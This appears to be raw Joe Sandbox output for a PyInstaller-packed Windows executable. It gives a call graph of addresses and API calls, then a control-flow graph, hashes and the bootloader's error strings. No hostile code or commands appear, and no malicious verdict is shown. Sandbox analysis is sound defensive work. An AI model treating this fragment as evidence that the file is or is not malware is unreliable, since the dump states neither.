56204 7ff7ca7a4b97 56203->56204 56205 7ff7ca7a4ada 56203->56205 56207 7ff7ca7a4b9f 56204->56207 56208 7ff7ca7a4bc1 56204->56208 56206 7ff7ca7a4b06 GetFileInformationByHandle 56205->56206 56252 7ff7ca7a4e10 21 API calls _fread_nolock 56205->56252 56210 7ff7ca7a4b2f 56206->56210 56211 7ff7ca7a4bb2 GetLastError 56206->56211 56207->56211 56212 7ff7ca7a4ba3 56207->56212 56213 7ff7ca7a4be4 PeekNamedPipe 56208->56213 56214 7ff7ca7a4b82 56208->56214 56216 7ff7ca7a4cd4 51 API calls 56210->56216 56255 7ff7ca7a4368 11 API calls 2 library calls 56211->56255 56254 7ff7ca7a43f4 11 API calls _get_daylight 56212->56254 56213->56214 56219 7ff7ca79b870 _log10_special 8 API calls 56214->56219 56215 7ff7ca7a4af4 56215->56206 56215->56214 56220 7ff7ca7a4b3a 56216->56220 56221 7ff7ca7a49c4 56219->56221 56245 7ff7ca7a4c34 56220->56245 56221->56193 56221->56194 56224 7ff7ca7a4c34 10 API calls 56225 7ff7ca7a4b59 56224->56225 56226 7ff7ca7a4c34 10 API calls 56225->56226 56227 7ff7ca7a4b6a 56226->56227 56227->56214 56253 7ff7ca7a43f4 11 API calls _get_daylight 56227->56253 56229->56185 56230->56191 56231->56198 56232->56190 56233->56202 56236 7ff7ca7a4cfc 56234->56236 56235 7ff7ca7a4a2d 56244 7ff7ca7a4e10 21 API calls _fread_nolock 56235->56244 56236->56235 56256 7ff7ca7aea34 51 API calls 2 library calls 56236->56256 56238 7ff7ca7a4d90 56238->56235 56257 7ff7ca7aea34 51 API calls 2 library calls 56238->56257 56240 7ff7ca7a4da3 56240->56235 56258 7ff7ca7aea34 51 API calls 2 library calls 56240->56258 56242 7ff7ca7a4db6 56242->56235 56259 7ff7ca7aea34 51 API calls 2 library calls 56242->56259 56244->56202 56246 7ff7ca7a4c50 56245->56246 56247 7ff7ca7a4c5d FileTimeToSystemTime 56245->56247 56246->56247 56249 7ff7ca7a4c58 56246->56249 56248 7ff7ca7a4c71 SystemTimeToTzSpecificLocalTime 56247->56248 56247->56249 56248->56249 56250 7ff7ca79b870 _log10_special 8 API calls 56249->56250 56251 7ff7ca7a4b49 56250->56251 56251->56224 56252->56215 56253->56214 56254->56214 56255->56214 56256->56238 56257->56240 56258->56242 56259->56235 56260 7ff7ca7a8c79 56272 7ff7ca7a96e8 56260->56272 56262 7ff7ca7a8c7e 56263 7ff7ca7a8cef 56262->56263 56264 7ff7ca7a8ca5 GetModuleHandleW 56262->56264 56266 7ff7ca7a8b7c 11 API calls 56263->56266 56264->56263 56265 7ff7ca7a8cb2 56264->56265 56265->56263 56271 7ff7ca7a8da0 GetModuleHandleExW GetProcAddress FreeLibrary 56265->56271 56267 7ff7ca7a8d2b 56266->56267 56268 7ff7ca7a8d32 56267->56268 56269 7ff7ca7a8d48 11 API calls 56267->56269 56270 7ff7ca7a8d44 56269->56270 56271->56263 56277 7ff7ca7aa460 45 API calls 3 library calls 56272->56277 56274 7ff7ca7a96f1 56278 7ff7ca7a9814 45 API calls __FrameHandler3::FrameUnwindToEmptyState 56274->56278 56277->56274 56279 7ff7ca79bf5c 56300 7ff7ca79c12c 56279->56300 56282 7ff7ca79c0a8 56419 7ff7ca79c44c 7 API calls 2 library calls 56282->56419 56283 7ff7ca79bf78 __scrt_acquire_startup_lock 56285 7ff7ca79c0b2 56283->56285 56292 7ff7ca79bf96 __scrt_release_startup_lock 56283->56292 56420 7ff7ca79c44c 7 API calls 2 library calls 56285->56420 56287 7ff7ca79bfbb 56288 7ff7ca79c0bd __FrameHandler3::FrameUnwindToEmptyState 56289 7ff7ca79c041 56306 7ff7ca79c594 56289->56306 56291 7ff7ca79c046 56309 7ff7ca791000 56291->56309 56292->56287 56292->56289 56416 7ff7ca7a8e44 45 API calls 56292->56416 56297 7ff7ca79c069 56297->56288 56418 7ff7ca79c2b0 7 API calls 56297->56418 56299 7ff7ca79c080 56299->56287 56301 7ff7ca79c134 56300->56301 56302 7ff7ca79c140 __scrt_dllmain_crt_thread_attach 56301->56302 56303 7ff7ca79bf70 56302->56303 56304 7ff7ca79c14d 56302->56304 56303->56282 56303->56283 56304->56303 56421 7ff7ca79cba8 7 API calls 2 library calls 56304->56421 56422 7ff7ca7b97e0 56306->56422 56310 7ff7ca791009 56309->56310 56424 7ff7ca7a4794 56310->56424 56312 7ff7ca79352b 56431 7ff7ca7933e0 56312->56431 56317 7ff7ca79b870 _log10_special 8 API calls 56320 7ff7ca79372a 56317->56320 56318 7ff7ca793736 56321 7ff7ca793f70 108 API calls 56318->56321 56319 7ff7ca79356c 56322 7ff7ca791bf0 49 API calls 56319->56322 56417 7ff7ca79c5d8 GetModuleHandleW 56320->56417 56323 7ff7ca793746 56321->56323 56341 7ff7ca793588 56322->56341 56324 7ff7ca793785 56323->56324 56521 7ff7ca7976a0 56323->56521 56530 7ff7ca7925f0 53 API calls _log10_special 56324->56530 56328 7ff7ca793778 56329 7ff7ca79379f 56328->56329 56330 7ff7ca79377d 56328->56330 56333 7ff7ca791bf0 49 API calls 56329->56333 56332 7ff7ca79f36c 74 API calls 56330->56332 56331 7ff7ca793538 56331->56317 56332->56324 56338 7ff7ca7937be 56333->56338 56334 7ff7ca79365f __vcrt_freefls 56335 7ff7ca793844 56334->56335 56336 7ff7ca797e10 14 API calls 56334->56336 56534 7ff7ca793e90 49 API calls 56335->56534 56339 7ff7ca7936ae 56336->56339 56348 7ff7ca7918f0 115 API calls 56338->56348 56519 7ff7ca797f80 40 API calls __vcrt_freefls 56339->56519 56340 7ff7ca793852 56343 7ff7ca793871 56340->56343 56344 7ff7ca793865 56340->56344 56493 7ff7ca797e10 56341->56493 56347 7ff7ca791bf0 49 API calls 56343->56347 56535 7ff7ca793fe0 56344->56535 56345 7ff7ca7936bd 56350 7ff7ca79380f 56345->56350 56352 7ff7ca7936cf 56345->56352 56362 7ff7ca793805 __vcrt_freefls 56347->56362 56349 7ff7ca7937df 56348->56349 56349->56341 56351 7ff7ca7937ef 56349->56351 56532 7ff7ca798400 58 API calls _log10_special 56350->56532 56531 7ff7ca7925f0 53 API calls _log10_special 56351->56531 56356 7ff7ca791bf0 49 API calls 56352->56356 56354 7ff7ca7986b0 2 API calls 56358 7ff7ca79389e SetDllDirectoryW 56354->56358 56359 7ff7ca7936f1 56356->56359 56357 7ff7ca793814 56533 7ff7ca797c40 84 API calls 2 library calls 56357->56533 56365 7ff7ca7938c3 56358->56365 56359->56362 56363 7ff7ca7936fc 56359->56363 56362->56354 56520 7ff7ca7925f0 53 API calls _log10_special 56363->56520 56366 7ff7ca793a50 56365->56366 56538 7ff7ca796560 53 API calls 56365->56538 56371 7ff7ca793a5a PostMessageW GetMessageW 56366->56371 56372 7ff7ca793a7d 56366->56372 56369 7ff7ca793834 56369->56335 56369->56362 56370 7ff7ca7938d5 56539 7ff7ca796b00 118 API calls 2 library calls 56370->56539 56371->56372 56506 7ff7ca793080 56372->56506 56374 7ff7ca7938ea 56376 7ff7ca793947 56374->56376 56378 7ff7ca793901 56374->56378 56540 7ff7ca7965a0 121 API calls _log10_special 56374->56540 56376->56366 56383 7ff7ca79395c 56376->56383 56390 7ff7ca793905 56378->56390 56541 7ff7ca796970 91 API calls 56378->56541 56545 7ff7ca7930e0 122 API calls 2 library calls 56383->56545 56384 7ff7ca793916 56384->56390 56542 7ff7ca796cd0 54 API calls 56384->56542 56387 7ff7ca793aa3 56388 7ff7ca793964 56388->56331 56392 7ff7ca79396c 56388->56392 56390->56376 56543 7ff7ca792870 53 API calls _log10_special 56390->56543 56546 7ff7ca7983e0 LocalFree 56392->56546 56393 7ff7ca79393f 56544 7ff7ca796780 FreeLibrary 56393->56544 56416->56289 56417->56297 56418->56299 56419->56285 56420->56288 56421->56303 56423 7ff7ca79c5ab GetStartupInfoW 56422->56423 56423->56291 56427 7ff7ca7ae790 56424->56427 56425 7ff7ca7ae7e3 56548 7ff7ca7a9b24 37 API calls 2 library calls 56425->56548 56427->56425 56428 7ff7ca7ae836 56427->56428 56549 7ff7ca7ae668 71 API calls _fread_nolock 56428->56549 56430 7ff7ca7ae80c 56430->56312 56550 7ff7ca79bb70 56431->56550 56434 7ff7ca793438 56552 7ff7ca7985a0 FindFirstFileExW 56434->56552 56435 7ff7ca79341b 56557 7ff7ca7929e0 51 API calls _log10_special 56435->56557 56439 7ff7ca7934a5 56560 7ff7ca798760 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 56439->56560 56440 7ff7ca79344b 56558 7ff7ca798620 CreateFileW GetFinalPathNameByHandleW CloseHandle 56440->56558 56442 7ff7ca79b870 _log10_special 8 API calls 56445 7ff7ca7934dd 56442->56445 56444 7ff7ca7934b3 56452 7ff7ca79342e 56444->56452 56561 7ff7ca7926c0 49 API calls _log10_special 56444->56561 56445->56331 56453 7ff7ca7918f0 56445->56453 56446 7ff7ca793458 56447 7ff7ca793474 __vcrt_InitializeCriticalSectionEx 56446->56447 56448 7ff7ca79345c 56446->56448 56447->56439 56559 7ff7ca7926c0 49 API calls _log10_special 56448->56559 56451 7ff7ca79346d 56451->56452 56452->56442 56454 7ff7ca793f70 108 API calls 56453->56454 56455 7ff7ca791925 56454->56455 56456 7ff7ca791bb6 56455->56456 56458 7ff7ca7976a0 83 API calls 56455->56458 56457 7ff7ca79b870 _log10_special 8 API calls 56456->56457 56459 7ff7ca791bd1 56457->56459 56460 7ff7ca79196b 56458->56460 56459->56318 56459->56319 56462 7ff7ca79f9f4 73 API calls 56460->56462 56492 7ff7ca79199c 56460->56492 56461 7ff7ca79f36c 74 API calls 56461->56456 56463 7ff7ca791985 56462->56463 56464 7ff7ca7919a1 56463->56464 56465 7ff7ca791989 56463->56465 56466 7ff7ca79f6bc _fread_nolock 53 API calls 56464->56466 56562 7ff7ca792760 53 API calls 2 library calls 56465->56562 56468 7ff7ca7919b9 56466->56468 56469 7ff7ca7919bf 56468->56469 56470 7ff7ca7919d7 56468->56470 56563 7ff7ca792760 53 API calls 2 library calls 56469->56563 56472 7ff7ca791a06 56470->56472 56473 7ff7ca7919ee 56470->56473 56475 7ff7ca791bf0 49 API calls 56472->56475 56564 7ff7ca792760 53 API calls 2 library calls 56473->56564 56476 7ff7ca791a1d 56475->56476 56477 7ff7ca791bf0 49 API calls 56476->56477 56478 7ff7ca791a68 56477->56478 56479 7ff7ca79f9f4 73 API calls 56478->56479 56480 7ff7ca791a8c 56479->56480 56481 7ff7ca791aa1 56480->56481 56482 7ff7ca791ab9 56480->56482 56565 7ff7ca792760 53 API calls 2 library calls 56481->56565 56484 7ff7ca79f6bc _fread_nolock 53 API calls 56482->56484 56485 7ff7ca791ace 56484->56485 56486 7ff7ca791ad4 56485->56486 56487 7ff7ca791aec 56485->56487 56566 7ff7ca792760 53 API calls 2 library calls 56486->56566 56567 7ff7ca79f430 37 API calls 2 library calls 56487->56567 56490 7ff7ca791b06 56490->56492 56568 7ff7ca7925f0 53 API calls _log10_special 56490->56568 56492->56461 56494 7ff7ca797e1a 56493->56494 56495 7ff7ca7986b0 2 API calls 56494->56495 56496 7ff7ca797e39 GetEnvironmentVariableW 56495->56496 56497 7ff7ca797ea2 56496->56497 56498 7ff7ca797e56 ExpandEnvironmentStringsW 56496->56498 56500 7ff7ca79b870 _log10_special 8 API calls 56497->56500 56498->56497 56499 7ff7ca797e78 56498->56499 56569 7ff7ca798760 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 56499->56569 56502 7ff7ca797eb4 56500->56502 56502->56334 56503 7ff7ca797e8a 56504 7ff7ca79b870 _log10_special 8 API calls 56503->56504 56505 7ff7ca797e9a 56504->56505 56505->56334 56570 7ff7ca795af0 56506->56570 56509 7ff7ca7930b9 56515 7ff7ca7933a0 56509->56515 56511 7ff7ca7930a1 56511->56509 56640 7ff7ca795800 56511->56640 56513 7ff7ca7930ad 56513->56509 56649 7ff7ca795990 53 API calls 56513->56649 56516 7ff7ca7933ae 56515->56516 56517 7ff7ca7933bf 56516->56517 56712 7ff7ca798180 FreeLibrary 56516->56712 56547 7ff7ca796780 FreeLibrary 56517->56547 56519->56345 56520->56331 56522 7ff7ca7976c4 56521->56522 56523 7ff7ca79f9f4 73 API calls 56522->56523 56528 7ff7ca79779b __vcrt_freefls 56522->56528 56524 7ff7ca7976e0 56523->56524 56524->56528 56713 7ff7ca7a6bd8 56524->56713 56526 7ff7ca79f9f4 73 API calls 56529 7ff7ca7976f5 56526->56529 56527 7ff7ca79f6bc _fread_nolock 53 API calls 56527->56529 56528->56328 56529->56526 56529->56527 56529->56528 56530->56331 56531->56331 56532->56357 56533->56369 56534->56340 56536 7ff7ca791bf0 49 API calls 56535->56536 56537 7ff7ca794010 56536->56537 56537->56362 56538->56370 56539->56374 56540->56378 56541->56384 56542->56390 56543->56393 56544->56376 56545->56388 56547->56387 56548->56430 56549->56430 56551 7ff7ca7933ec GetModuleFileNameW 56550->56551 56551->56434 56551->56435 56553 7ff7ca7985df FindClose 56552->56553 56554 7ff7ca7985f2 56552->56554 56553->56554 56555 7ff7ca79b870 _log10_special 8 API calls 56554->56555 56556 7ff7ca793442 56555->56556 56556->56439 56556->56440 56557->56452 56558->56446 56559->56451 56560->56444 56561->56452 56562->56492 56563->56492 56564->56492 56565->56492 56566->56492 56567->56490 56568->56492 56569->56503 56571 7ff7ca795b05 56570->56571 56572 7ff7ca791bf0 49 API calls 56571->56572 56573 7ff7ca795b41 56572->56573 56574 7ff7ca795b4a 56573->56574 56575 7ff7ca795b6d 56573->56575 56660 7ff7ca7925f0 53 API calls _log10_special 56574->56660 56577 7ff7ca793fe0 49 API calls 56575->56577 56578 7ff7ca795b85 56577->56578 56579 7ff7ca795ba3 56578->56579 56661 7ff7ca7925f0 53 API calls _log10_special 56578->56661 56650 7ff7ca793f10 56579->56650 56582 7ff7ca79b870 _log10_special 8 API calls 56584 7ff7ca79308e 56582->56584 56584->56509 56601 7ff7ca795c80 56584->56601 56585 7ff7ca795bbb 56587 7ff7ca793fe0 49 API calls 56585->56587 56588 7ff7ca795bd4 56587->56588 56589 7ff7ca795bf9 56588->56589 56590 7ff7ca795bd9 56588->56590 56592 7ff7ca7981a0 3 API calls 56589->56592 56662 7ff7ca7925f0 53 API calls _log10_special 56590->56662 56593 7ff7ca795c06 56592->56593 56594 7ff7ca795c12 56593->56594 56595 7ff7ca795c49 56593->56595 56596 7ff7ca7986b0 2 API calls 56594->56596 56664 7ff7ca7950b0 95 API calls 56595->56664 56598 7ff7ca795c2a 56596->56598 56663 7ff7ca7929e0 51 API calls _log10_special 56598->56663 56600 7ff7ca795b63 56600->56582 56665 7ff7ca794c80 56601->56665 56603 7ff7ca795cba 56604 7ff7ca795cc2 56603->56604 56605 7ff7ca795cd3 56603->56605 56697 7ff7ca7925f0 53 API calls _log10_special 56604->56697 56672 7ff7ca794450 56605->56672 56609 7ff7ca795cdf 56698 7ff7ca7925f0 53 API calls _log10_special 56609->56698 56610 7ff7ca795cf0 56613 7ff7ca795cff 56610->56613 56614 7ff7ca795d10 56610->56614 56612 7ff7ca795cce 56612->56511 56699 7ff7ca7925f0 53 API calls _log10_special 56613->56699 56676 7ff7ca794700 56614->56676 56617 7ff7ca795d2b 56618 7ff7ca795d2f 56617->56618 56619 7ff7ca795d40 56617->56619 56700 7ff7ca7925f0 53 API calls _log10_special 56618->56700 56621 7ff7ca795d4f 56619->56621 56622 7ff7ca795d60 56619->56622 56701 7ff7ca7925f0 53 API calls _log10_special 56621->56701 56683 7ff7ca7945a0 56622->56683 56626 7ff7ca795d6f 56702 7ff7ca7925f0 53 API calls _log10_special 56626->56702 56627 7ff7ca795d80 56629 7ff7ca795d8f 56627->56629 56630 7ff7ca795da0 56627->56630 56703 7ff7ca7925f0 53 API calls _log10_special 56629->56703 56632 7ff7ca795db1 56630->56632 56634 7ff7ca795dc2 56630->56634 56704 7ff7ca7925f0 53 API calls _log10_special 56632->56704 56637 7ff7ca795dec 56634->56637 56705 7ff7ca7a65c0 73 API calls 56634->56705 56636 7ff7ca795dda 56706 7ff7ca7a65c0 73 API calls 56636->56706 56637->56612 56707 7ff7ca7925f0 53 API calls _log10_special 56637->56707 56641 7ff7ca795820 56640->56641 56641->56641 56642 7ff7ca795849 56641->56642 56648 7ff7ca795860 __vcrt_freefls 56641->56648 56711 7ff7ca7925f0 53 API calls _log10_special 56642->56711 56644 7ff7ca795855 56644->56513 56645 7ff7ca79596b 56645->56513 56646 7ff7ca791440 116 API calls 56646->56648 56647 7ff7ca7925f0 53 API calls 56647->56648 56648->56645 56648->56646 56648->56647 56649->56509 56651 7ff7ca793f1a 56650->56651 56652 7ff7ca7986b0 2 API calls 56651->56652 56653 7ff7ca793f3f 56652->56653 56654 7ff7ca79b870 _log10_special 8 API calls 56653->56654 56655 7ff7ca793f67 56654->56655 56655->56585 56656 7ff7ca7981a0 56655->56656 56657 7ff7ca7986b0 2 API calls 56656->56657 56658 7ff7ca7981b4 LoadLibraryExW 56657->56658 56659 7ff7ca7981d3 __vcrt_freefls 56658->56659 56659->56585 56660->56600 56661->56579 56662->56600 56663->56600 56664->56600 56666 7ff7ca794cac 56665->56666 56667 7ff7ca794cb4 56666->56667 56668 7ff7ca794e54 56666->56668 56708 7ff7ca7a5db4 48 API calls 56666->56708 56667->56603 56669 7ff7ca795017 __vcrt_freefls 56668->56669 56670 7ff7ca794180 47 API calls 56668->56670 56669->56603 56670->56668 56673 7ff7ca794480 56672->56673 56674 7ff7ca79b870 _log10_special 8 API calls 56673->56674 56675 7ff7ca7944ea 56674->56675 56675->56609 56675->56610 56677 7ff7ca79476f 56676->56677 56681 7ff7ca79471b 56676->56681 56710 7ff7ca794300 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 56677->56710 56679 7ff7ca79477c 56679->56617 56682 7ff7ca79475a 56681->56682 56709 7ff7ca794300 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 56681->56709 56682->56617 56684 7ff7ca7945b5 56683->56684 56685 7ff7ca791bf0 49 API calls 56684->56685 56686 7ff7ca794601 56685->56686 56687 7ff7ca791bf0 49 API calls 56686->56687 56696 7ff7ca794687 __vcrt_freefls 56686->56696 56689 7ff7ca794640 56687->56689 56688 7ff7ca79b870 _log10_special 8 API calls 56690 7ff7ca7946dc 56688->56690 56691 7ff7ca7986b0 2 API calls 56689->56691 56689->56696 56690->56626 56690->56627 56692 7ff7ca79465a 56691->56692 56693 7ff7ca7986b0 2 API calls 56692->56693 56694 7ff7ca794671 56693->56694 56695 7ff7ca7986b0 2 API calls 56694->56695 56695->56696 56696->56688 56697->56612 56698->56612 56699->56612 56700->56612 56701->56612 56702->56612 56703->56612 56704->56612 56705->56636 56706->56637 56707->56612 56708->56666 56709->56682 56710->56679 56711->56644 56712->56517 56714 7ff7ca7a6c08 56713->56714 56717 7ff7ca7a66e4 56714->56717 56716 7ff7ca7a6c21 56716->56529 56718 7ff7ca7a66ff 56717->56718 56719 7ff7ca7a672e 56717->56719 56728 7ff7ca7a9b24 37 API calls 2 library calls 56718->56728 56727 7ff7ca7a477c EnterCriticalSection 56719->56727 56722 7ff7ca7a6733 56723 7ff7ca7a6750 38 API calls 56722->56723 56724 7ff7ca7a673f 56723->56724 56725 7ff7ca7a4788 _fread_nolock LeaveCriticalSection 56724->56725 56726 7ff7ca7a671f 56725->56726 56726->56716 56728->56726 56729 7ff7ca7aec9c 56730 7ff7ca7aee8e 56729->56730 56734 7ff7ca7aecde _isindst 56729->56734 56775 7ff7ca7a43f4 11 API calls _get_daylight 56730->56775 56732 7ff7ca79b870 _log10_special 8 API calls 56733 7ff7ca7aeea9 56732->56733 56734->56730 56735 7ff7ca7aed5e _isindst 56734->56735 56750 7ff7ca7b54a4 56735->56750 56740 7ff7ca7aeeba 56742 7ff7ca7a9c10 _isindst 17 API calls 56740->56742 56744 7ff7ca7aeece 56742->56744 56747 7ff7ca7aedbb 56749 7ff7ca7aee7e 56747->56749 56774 7ff7ca7b54e8 37 API calls _isindst 56747->56774 56749->56732 56751 7ff7ca7aed7c 56750->56751 56752 7ff7ca7b54b3 56750->56752 56756 7ff7ca7b48a8 56751->56756 56776 7ff7ca7af5e8 EnterCriticalSection 56752->56776 56754 7ff7ca7b54bb 56754->56751 56755 7ff7ca7b5314 55 API calls 56754->56755 56755->56751 56757 7ff7ca7b48b1 56756->56757 56758 7ff7ca7aed91 56756->56758 56777 7ff7ca7a43f4 11 API calls _get_daylight 56757->56777 56758->56740 56762 7ff7ca7b48d8 56758->56762 56760 7ff7ca7b48b6 56778 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 56760->56778 56763 7ff7ca7b48e1 56762->56763 56764 7ff7ca7aeda2 56762->56764 56779 7ff7ca7a43f4 11 API calls _get_daylight 56763->56779 56764->56740 56768 7ff7ca7b4908 56764->56768 56766 7ff7ca7b48e6 56780 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 56766->56780 56769 7ff7ca7b4911 56768->56769 56771 7ff7ca7aedb3 56768->56771 56781 7ff7ca7a43f4 11 API calls _get_daylight 56769->56781 56771->56740 56771->56747 56772 7ff7ca7b4916 56782 7ff7ca7a9bf0 37 API calls _invalid_parameter_noinfo 56772->56782 56774->56749 56775->56749 56777->56760 56778->56758 56779->56766 56780->56764 56781->56772 56782->56771

                                                                                        Executed Functions

                                                                                        Function 00007FF7CA791000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ff7ca791000-7ff7ca793536 call 7ff7ca79f138 call 7ff7ca79f140 call 7ff7ca79bb70 call 7ff7ca7a4700 call 7ff7ca7a4794 call 7ff7ca7933e0 14 7ff7ca793544-7ff7ca793566 call 7ff7ca7918f0 0->14 15 7ff7ca793538-7ff7ca79353f 0->15 20 7ff7ca793736-7ff7ca79374c call 7ff7ca793f70 14->20 21 7ff7ca79356c-7ff7ca793583 call 7ff7ca791bf0 14->21 16 7ff7ca79371a-7ff7ca793735 call 7ff7ca79b870 15->16 27 7ff7ca793785-7ff7ca79379a call 7ff7ca7925f0 20->27 28 7ff7ca79374e-7ff7ca79377b call 7ff7ca7976a0 20->28 26 7ff7ca793588-7ff7ca7935c1 21->26 29 7ff7ca793653-7ff7ca79366d call 7ff7ca797e10 26->29 30 7ff7ca7935c7-7ff7ca7935cb 26->30 44 7ff7ca793712 27->44 41 7ff7ca79379f-7ff7ca7937be call 7ff7ca791bf0 28->41 42 7ff7ca79377d-7ff7ca793780 call 7ff7ca79f36c 28->42 45 7ff7ca79366f-7ff7ca793675 29->45 46 7ff7ca793695-7ff7ca79369c 29->46 34 7ff7ca793638-7ff7ca79364d call 7ff7ca7918e0 30->34 35 7ff7ca7935cd-7ff7ca7935e5 call 7ff7ca7a4560 30->35 34->29 34->30 52 7ff7ca7935f2-7ff7ca79360a call 7ff7ca7a4560 35->52 53 7ff7ca7935e7-7ff7ca7935eb 35->53 63 7ff7ca7937c1-7ff7ca7937ca 41->63 42->27 44->16 50 7ff7ca793682-7ff7ca793690 call 7ff7ca7a415c 45->50 51 7ff7ca793677-7ff7ca793680 45->51 54 7ff7ca7936a2-7ff7ca7936c0 call 7ff7ca797e10 call 7ff7ca797f80 46->54 55 7ff7ca793844-7ff7ca793863 call 7ff7ca793e90 46->55 50->46 51->50 69 7ff7ca793617-7ff7ca79362f call 7ff7ca7a4560 52->69 70 7ff7ca79360c-7ff7ca793610 52->70 53->52 78 7ff7ca79380f-7ff7ca79381e call 7ff7ca798400 54->78 79 7ff7ca7936c6-7ff7ca7936c9 54->79 66 7ff7ca793871-7ff7ca793882 call 7ff7ca791bf0 55->66 67 7ff7ca793865-7ff7ca79386f call 7ff7ca793fe0 55->67 63->63 68 7ff7ca7937cc-7ff7ca7937e9 call 7ff7ca7918f0 63->68 81 7ff7ca793887-7ff7ca7938a1 call 7ff7ca7986b0 66->81 67->81 68->26 82 7ff7ca7937ef-7ff7ca793800 call 7ff7ca7925f0 68->82 69->34 83 7ff7ca793631 69->83 70->69 93 7ff7ca793820 78->93 94 7ff7ca79382c-7ff7ca793836 call 7ff7ca797c40 78->94 79->78 84 7ff7ca7936cf-7ff7ca7936f6 call 7ff7ca791bf0 79->84 95 7ff7ca7938af-7ff7ca7938c1 SetDllDirectoryW 81->95 96 7ff7ca7938a3 81->96 82->44 83->34 97 7ff7ca793805-7ff7ca79380d call 7ff7ca7a415c 84->97 98 7ff7ca7936fc-7ff7ca793703 call 7ff7ca7925f0 84->98 93->94 94->81 112 7ff7ca793838 94->112 100 7ff7ca7938d0-7ff7ca7938ec call 7ff7ca796560 call 7ff7ca796b00 95->100 101 7ff7ca7938c3-7ff7ca7938ca 95->101 96->95 97->81 109 7ff7ca793708-7ff7ca79370a 98->109 118 7ff7ca793947-7ff7ca79394a call 7ff7ca796510 100->118 119 7ff7ca7938ee-7ff7ca7938f4 100->119 101->100 102 7ff7ca793a50-7ff7ca793a58 101->102 110 7ff7ca793a5a-7ff7ca793a77 PostMessageW GetMessageW 102->110 111 7ff7ca793a7d-7ff7ca793a92 call 7ff7ca7933d0 call 7ff7ca793080 call 7ff7ca7933a0 102->111 109->44 110->111 128 7ff7ca793a97-7ff7ca793aaf call 7ff7ca796780 call 7ff7ca796510 111->128 112->55 126 7ff7ca79394f-7ff7ca793956 118->126 121 7ff7ca7938f6-7ff7ca793903 call 7ff7ca7965a0 119->121 122 7ff7ca79390e-7ff7ca793918 call 7ff7ca796970 119->122 121->122 133 7ff7ca793905-7ff7ca79390c 121->133 135 7ff7ca793923-7ff7ca793931 call 7ff7ca796cd0 122->135 136 7ff7ca79391a-7ff7ca793921 122->136 126->102 130 7ff7ca79395c-7ff7ca793966 call 7ff7ca7930e0 126->130 130->109 144 7ff7ca79396c-7ff7ca793980 call 7ff7ca7983e0 130->144 138 7ff7ca79393a-7ff7ca793942 call 7ff7ca792870 call 7ff7ca796780 133->138 135->126 145 7ff7ca793933 135->145 136->138 138->118 151 7ff7ca793982-7ff7ca79399f PostMessageW GetMessageW 144->151 152 7ff7ca7939a5-7ff7ca7939e8 call 7ff7ca797f20 call 7ff7ca797fc0 call 7ff7ca796780 call 7ff7ca796510 call 7ff7ca797ec0 144->152 145->138 151->152 163 7ff7ca7939ea-7ff7ca793a00 call 7ff7ca7981f0 call 7ff7ca797ec0 152->163 164 7ff7ca793a3d-7ff7ca793a4b call 7ff7ca7918a0 152->164 163->164 171 7ff7ca793a02-7ff7ca793a10 163->171 164->109 172 7ff7ca793a31-7ff7ca793a38 call 7ff7ca792870 171->172 173 7ff7ca793a12-7ff7ca793a2c call 7ff7ca7925f0 call 7ff7ca7918a0 171->173 172->164 173->109
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.2284834998.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000009.00000002.2284804099.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2284923903.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285089335.00007FF7CA7D3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000009.00000002.2285165136.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                        • API String ID: 514040917-585287483
                                                                                        • Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                                                        • Instruction ID: 538e011d137946bfc97a864317923fd5f9b93fe68f7a50e41baf04f09b6f111f
                                                                                        • Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                                                        • Instruction Fuzzy Hash: 82F1AF61A0868261FA14FF32B474AF9A361BF5C7A2FC440B6DA1D43692EF2CE554C360
                                                                                        Function 00007FF7CA7B4F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
